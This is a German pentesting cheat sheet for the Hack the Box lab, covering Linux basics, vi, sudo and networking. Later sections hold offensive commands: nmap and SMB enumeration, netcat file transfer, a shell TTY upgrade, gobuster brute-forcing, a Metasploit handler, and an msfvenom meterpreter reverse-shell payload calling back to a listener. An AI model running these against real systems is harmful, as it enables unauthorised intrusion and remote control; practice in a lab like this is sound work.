WIP – Cheat Sheet für Befehle welche ich u.a. im PenTesting Lab Hack the Box immer wieder brauche
Allgemein
Dateien und Berechtigungen als Liste anzeigen (inkl. versteckter Dateien) und mit lesbarer Größe (-h)
ls -al ls -hal
Suchen
Alle Dateien aufliste (rekursiv)
find . -type f
Nach einem Wort in Dateien suchen (rekursiv), beginnt mit „pattern“
grep -rniw '/path/to/somewhere/' -e 'pattern.*'
Nach Dateinamen suchen (rekursiv) und dabei auch Verlinkungen folgen (-follow)
find . -iname "*.mov" -follow
String suchen in Binärdateien
strings App_Data/Umbraco.sdf | grep -i 'admin'
Prozesse und Pakete
Laufende Prozesse anzeigen
ps -aux
Installierte (Packet) Version anzeigen
dpkg-query --search <pathCommand> dpkg -s <packagename>
Schleifen
Bash Schleife um Zeilen zu lesen
for $line read; do echo $line; done < datei.txt while read line; do echo $line; done < datei.txt
Berechtigungen
Datei ausführbar machen
chmod +x <file>
VI
http://support.moonpoint.com/software/editors/vi/remove-lines-string.php
Suchen
/
Alles löschen bis zum vorkommen (rock you)
d/rock you
Ganze Zeile löschen
dd
Alles löschen mit dem vorkommen (dog)
:g/dog/d
alle Zeilen welche mit einem Punkt oder zwei Punkten anfangen löschen und Leerzeilen löschen
:g/^\ \.\| \.\./d :g/^$/d
Einfügen Mode
:set paste :set nopaste
Rückgängig
u
Sudo
Pfade zur sudoers Dateien
/etc/sudoes /etc/sudoers.d/
Berechtigungen (Befehle) prüfen
sudo -l
per sudo in eine Datei schreiben
echo 'deb blah ... blah' | sudo tee -a /etc/apt/sources.list
Krypto, HEX etc.
MD5 Hash erzeugen
echo -n Welcome | md5sum
String in Hex umwandeln
echo -n "HELP" | od -A n -t x1
Zeichen zählen / Wörter zählen
echo hello | wc -w echo hello | wc -c
Netzwerk Allgemein
Ping back prüfen
sudo tcpdump -i tun0 icmp
Lokale offene Ports anzeigen
sudo lsof -i -P -n | grep LISTEN sudo netstat -tulpn | grep LISTEN sudo lsof -i: sudo nmap -sTU -O IP-address-Here
Nach gängigen offenen Ports scannen, sowie Dienst und Version herausfinden und in der Datei defaultPorts.nmap speichern.
nmap -sV -sC -oA defaultPorts.nmap 10.10.10.1
Nach allen offenen Ports scannen
nmap -p- -oA allPorts.nmap 10.10.10.1
Erst nach Ports suchen und dann gegen die offenen Ports Scripte laufen lassen
ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.27 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) nmap -sC -sV -p$ports 10.10.10.27
TCP Dateiübertragung
nc -lvnp 4000 > line.out nc -w 3 [destination] 1234 < out.file
https://nakkaya.com/2009/04/15/using-netcat-for-file-transfers/
SMB Befehle
SMB Verzeichnisse auflisten mit login und anonym (-N)
smbclient -L 192.167.1.1 smbclient -N -L 192.167.1.1
Auf SMB Share Zugreifen
smbclient \\\\192.168.1.1\Share
Schreibzugriff auf SMB Verzeichnis prüfen (für anonymous login -u ‚ ‚)
smbmap -H 192.168.1.1 Smbmap -u user -H 192.168.1.1
SMB Server erstellen
sudo smbserver.py -ip 192.168.178.41 -port 4000 -debug -smb2support shareName <path>
MSSQL
MSSQL Client connect
mssqlclient.py ARCHETYPE\[email protected] -windows-auth
Shells
Upgrade zu TTY Session
python3 -c 'import pty; pty.spawn("/bin/bash")'
Mit STRG+Z
in den Hintergrund setzten
stty raw -echo fg
Größe manuell setzten
lokal: stty size
remote: stty rows 54 columns 210
Web und HTTP
Python Webserver erstellen
python3 -m http.server 8080 --bind 10.10.14.120
Webserver Verzeichnisse mit GoBuster scannen
gobuster dir -u http://10.10.10.171 -o hb_openadmin/gobuster-root.out -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
Meter Sploit
MSFConsole starten inkl. Datenbank, falls diese noch nicht läuft
mfsdb run
Modul suchen und laden
search <name> use <Pfad>
Listener
use exploit/multi/handler
Payload erzeugen
/usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.36 LPORT=4444 -f exe -o payload.exe